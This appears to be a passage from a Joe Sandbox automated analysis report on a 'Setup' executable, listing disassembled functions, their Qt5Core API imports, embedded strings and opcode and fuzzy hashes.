                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Debug@@$Logger@@Message$Category@@Logging$?warning@Enabled@H00@Warning$String@@String@@@$CreateInit_thread_footerInitializeInstancemalloc
                                                                                                                                                              • String ID: Failed to initialize COM:$Monitor is already active, call stopMonitoring() first
                                                                                                                                                              • API String ID: 1655049193-1295506742
                                                                                                                                                              • Opcode ID: 24cf72056fb79e39a1943d54d2b72835dea6d4187dd0a6fa57f6eb8614c548b4
                                                                                                                                                              • Instruction ID: 72dfdfd376ebbf28536f7ca719707b5f6c3a53706ad95536793c66b25984faab
                                                                                                                                                              • Opcode Fuzzy Hash: 24cf72056fb79e39a1943d54d2b72835dea6d4187dd0a6fa57f6eb8614c548b4
                                                                                                                                                              • Instruction Fuzzy Hash: 4F4130A6B0AB4292EB829B36E51426A63A1FF84B94F444036DF5E07765EF3CE455CF00
                                                                                                                                                              Function 00007FFBA197B870 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 108timewindowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA197CAF0: ?qHash@@YAIAEBVQByteArray@@I@Z.QT5CORE(?,?,?,00007FFBA197B899), ref: 00007FFBA197CB21
                                                                                                                                                              • ?qHash@@YAIAEBVQByteArray@@I@Z.QT5CORE ref: 00007FFBA197B8BA
                                                                                                                                                              • ?willGrow@QHashData@@QEAA_NXZ.QT5CORE ref: 00007FFBA197B8E2
                                                                                                                                                              • ??0QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA197B902
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA197B91D
                                                                                                                                                              • ?allocateNode@QHashData@@QEAAPEAXH@Z.QT5CORE ref: 00007FFBA197B941
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA197B973
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA197B988
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH0@Z.QT5CORE ref: 00007FFBA197B9A1
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE ref: 00007FFBA197B9AD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE ref: 00007FFBA197B9C0
                                                                                                                                                              • ??4QByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA197B9E0
                                                                                                                                                              • ??4QByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA197B9ED
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ?stop@QBasicTimer@@QEAAXXZ.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CBE1
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ?currentDateTimeUtc@QDateTime@@SA?AV1@XZ.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CBF8
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ?secsTo@QDateTime@@QEBA_JAEBV1@@Z.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CC05
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CC13
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ?start@QBasicTimer@@QEAAXHPEAVQObject@@@Z.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CC34
                                                                                                                                                              Strings
                                                                                                                                                              • QNetworkAccessCache::addEntry: overriding active cache entry '%s', xrefs: 00007FFBA197B9B3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Date$Array@@ByteTime@@$BasicData@@HashHash@@Logger@@MessageString@@Timer@@V0@@$?allocate?current?data@?secs?start@?stop@?warning@?willChar@@Grow@Node@Object@@@TimeUtc@V1@@
                                                                                                                                                              • String ID: QNetworkAccessCache::addEntry: overriding active cache entry '%s'
                                                                                                                                                              • API String ID: 1877290419-1724491869
                                                                                                                                                              • Opcode ID: 5f32abb3641f47d625b455e8e9e1d3d0a25ab24e0b94f46d1454bfe7c8e1da55
                                                                                                                                                              • Instruction ID: 20bb1689d07f37cd7078cacd205f24ca506317907a869b2730f8740d813bfbd7
                                                                                                                                                              • Opcode Fuzzy Hash: 5f32abb3641f47d625b455e8e9e1d3d0a25ab24e0b94f46d1454bfe7c8e1da55
                                                                                                                                                              • Instruction Fuzzy Hash: 1D415D62A09A4682EB51DB32E95426AB361FF84FD8F804032DE5E47B65EF3CD446CB40
                                                                                                                                                              Function 00007FFBA1978050 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 103COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?getAndRef@ExternalRefCountData@QtSharedPointer@@SAPEAU12@PEBVQObject@@@Z.QT5CORE ref: 00007FFBA1978074
                                                                                                                                                              • ?connectImpl@QObject@@CA?AVConnection@QMetaObject@@PEBV1@PEAPEAX01PEAVQSlotObjectBase@QtPrivate@@W4ConnectionType@Qt@@PEBHPEBU3@@Z.QT5CORE ref: 00007FFBA197811F
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA197812D
                                                                                                                                                              • ?connectImpl@QObject@@CA?AVConnection@QMetaObject@@PEBV1@PEAPEAX01PEAVQSlotObjectBase@QtPrivate@@W4ConnectionType@Qt@@PEBHPEBU3@@Z.QT5CORE ref: 00007FFBA197819F
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19781AD
                                                                                                                                                              • ?connect@QObject@@QEBA?AVConnection@QMetaObject@@PEBV1@PEBD1W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19781D6
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19781E1
                                                                                                                                                              • ?connect@QObject@@QEBA?AVConnection@QMetaObject@@PEBV1@PEBD1W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA197820A
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA1978215
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object@@$Connection@Meta$ConnectionType@$?connect?connect@Base@Impl@ObjectPrivate@@Qt@@Qt@@@SlotU3@@$?getCountData@ExternalObject@@@Pointer@@Ref@SharedU12@
                                                                                                                                                              • String ID: 1_q_replyPreSharedKeyAuthenticationRequired(QSslPreSharedKeyAuthenticator*)$1_q_replySslErrors(QList<QSslError>)$2preSharedKeyAuthenticationRequired(QSslPreSharedKeyAuthenticator*)$2sslErrors(QList<QSslError>)
                                                                                                                                                              • API String ID: 2525764155-3276072006
                                                                                                                                                              • Opcode ID: d8f650d1aade913725fb9b69f54b74475846870826a486ca0953309f6e3bfbda
                                                                                                                                                              • Instruction ID: f245c4ded306e6c9b538f03a30db88dc18377e4a7ed074d26ab292d2f5114313
                                                                                                                                                              • Opcode Fuzzy Hash: d8f650d1aade913725fb9b69f54b74475846870826a486ca0953309f6e3bfbda
                                                                                                                                                              • Instruction Fuzzy Hash: 0451547250DB8696E7528F21F8402A9B764FB88BA4F444136EE9D13B64EF3CD599CF00
                                                                                                                                                              Function 00007FFBA197F9A0 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 99COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Device@@$Url@@$?flush@FileFormattingString@$?error?translate@?write@Application@@ComponentCoreFlags@Option@Option@2@@@@
                                                                                                                                                              • String ID: QNetworkAccessFileBackend$Write error writing to %1: %2
                                                                                                                                                              • API String ID: 1561919659-2240904960
                                                                                                                                                              • Opcode ID: b4ba73070c0d0319767477b394ad9b29b3bb95b4e59617cf83dd732e5a26fc2e
                                                                                                                                                              • Instruction ID: bc2f6249463524241a2c1242514125b682413fad12bdcf40b594a80b1fc73482
                                                                                                                                                              • Opcode Fuzzy Hash: b4ba73070c0d0319767477b394ad9b29b3bb95b4e59617cf83dd732e5a26fc2e
                                                                                                                                                              • Instruction Fuzzy Hash: E04120A160AB4682DB419B35E4140B96762FF85BB8F500232DE7E17BE4DF3CD44ACB50
                                                                                                                                                              Function 00007FFBA19F4150 Relevance: 22.7, APIs: 15, Instructions: 163COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA19F5000: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19F4181), ref: 00007FFBA19F5033
                                                                                                                                                                • Part of subcall function 00007FFBA19F5000: ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19F4181), ref: 00007FFBA19F5047
                                                                                                                                                                • Part of subcall function 00007FFBA19F5000: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19F4181), ref: 00007FFBA19F5082
                                                                                                                                                                • Part of subcall function 00007FFBA19F5000: ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19F4181), ref: 00007FFBA19F5096
                                                                                                                                                              • ?size@QListData@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F4190
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F41B8
                                                                                                                                                              • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F41C6
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F41D2
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F41DE
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F4248
                                                                                                                                                              • ?realloc@QListData@@QEAAXH@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F4252
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F425D
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F426B
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F429D
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F42B3
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F432E
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F4338
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F4342
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F43A0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?end@$String@@$?dispose@Data@1@@$?detach@?realloc@?size@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3180553871-0
                                                                                                                                                              • Opcode ID: 7f08835d1e33d6233f06fe46d745d3fd82a19b79c4bb314584fa47a47f25809b
                                                                                                                                                              • Instruction ID: fe33c872db855c5882d0e1f4ff98e1a0c2fbbdf4025ea424098bc9c27fd2c3eb
                                                                                                                                                              • Opcode Fuzzy Hash: 7f08835d1e33d6233f06fe46d745d3fd82a19b79c4bb314584fa47a47f25809b
                                                                                                                                                              • Instruction Fuzzy Hash: C06165B6A0A64296EB929F75D8441BD23A1FF84B98F448031DE1E47754EF3CE44ACF40
                                                                                                                                                              Function 00007FFBA19F7890 Relevance: 22.6, APIs: 15, Instructions: 150timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F78D3
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F78E1
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F78EF
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F7908
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F7915
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F7922
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F792F
                                                                                                                                                                • Part of subcall function 00007FFBA19F6970: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA19F69AC
                                                                                                                                                                • Part of subcall function 00007FFBA19F6970: ?detach_grow@QListData@@QEAAPEAUData@1@PEAHH@Z.QT5CORE ref: 00007FFBA19F69C5
                                                                                                                                                                • Part of subcall function 00007FFBA19F6970: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA19F69D1
                                                                                                                                                                • Part of subcall function 00007FFBA19F6970: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA19F69E3
                                                                                                                                                                • Part of subcall function 00007FFBA19F6970: ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA19F6A27
                                                                                                                                                                • Part of subcall function 00007FFBA19F6970: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA19F6A33
                                                                                                                                                                • Part of subcall function 00007FFBA19F6970: ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA19F6AB7
                                                                                                                                                                • Part of subcall function 00007FFBA19F6970: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA19F6AC0
                                                                                                                                                              • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F79CD
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F79D8
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F79E4
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F79F0
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F7A2A
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F7A35
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F7A40
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197A2FF), ref: 00007FFBA19F7AA4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$String@@$Array@@ByteV0@@$?dispose@?end@Data@1@Data@1@@$?detach@?detach_grow@BasicTimer@@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1320409717-0
                                                                                                                                                              • Opcode ID: 67a2e2b7b63446b59f839015a29955ef8488809d1cde54a2a87bc21edffcac82
                                                                                                                                                              • Instruction ID: 1c8b867772de71be940932a3d61de11c513b4af2809cb5ad89fa7bbe0a86fb7e
                                                                                                                                                              • Opcode Fuzzy Hash: 67a2e2b7b63446b59f839015a29955ef8488809d1cde54a2a87bc21edffcac82
                                                                                                                                                              • Instruction Fuzzy Hash: 196173B2A0AB4296EB55CF75E8400A973A1FB84BA8F444136DE5E47764EF3CD50ACF00
                                                                                                                                                              Function 00007FFBA197C8F0 Relevance: 22.6, APIs: 15, Instructions: 122timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DateString@@$Data@@HashTime@@$?size@Array@@Byte$?data@Char@@$?current?detach_helper@?free?free_helper@?hasHash@@Node@Node@1@Node@1@@Shrunk@TimeUtc@V0@@memcmp
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 405903728-0
                                                                                                                                                              • Opcode ID: 45cecd103bca49c4549ce1f700e9ac7d9a6a12254178e5e273f8a9bf37a208dd
                                                                                                                                                              • Instruction ID: 0c5216bed6acaf5cf24140c54ba2366249165f081e731bc92e0e298e0d3af96c
                                                                                                                                                              • Opcode Fuzzy Hash: 45cecd103bca49c4549ce1f700e9ac7d9a6a12254178e5e273f8a9bf37a208dd
                                                                                                                                                              • Instruction Fuzzy Hash: 45515B7270AB5682EB91EB21E44416E7769FF84B95F854032DE5E07B64DF3CE446CB00
                                                                                                                                                              Function 00007FFBA1A01BD0 Relevance: 21.2, APIs: 14, Instructions: 152memoryregistryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array$Data@@$?data@$?allocate@AllocationData@@@@@Flags@Option@U1@_$Close$Handle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2670224757-0
                                                                                                                                                              • Opcode ID: 69718d4976ff1eed2c1284e56e1815be2ae1022d3ffd9c021265f14fe969a510
                                                                                                                                                              • Instruction ID: 760e2d13b83ae10dcf9a895b79d6a74f7c078fa8d361b149720a9d62590adf7d
                                                                                                                                                              • Opcode Fuzzy Hash: 69718d4976ff1eed2c1284e56e1815be2ae1022d3ffd9c021265f14fe969a510
                                                                                                                                                              • Instruction Fuzzy Hash: A261A2B2B0AA9192D791DB25D4845BC77A5FB84B90F4AC532CE2E07754EF3CD885CB00
                                                                                                                                                              Function 00007FFBA19752D0 Relevance: 21.1, APIs: 14, Instructions: 128COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1975314
                                                                                                                                                              • ?detach_grow@QListData@@QEAAPEAUData@1@PEAHH@Z.QT5CORE ref: 00007FFBA197532B
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1975337
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1975349
                                                                                                                                                                • Part of subcall function 00007FFBA1977E70: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA197308E,?,?,00000000,00007FFBA1984BB6,?,?,?,00007FFBA198464A,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1977EB7
                                                                                                                                                                • Part of subcall function 00007FFBA1977E70: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA197308E,?,?,00000000,00007FFBA1984BB6,?,?,?,00007FFBA198464A,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1977EC5
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA197536C
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1975378
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA19753AA
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA19753B8
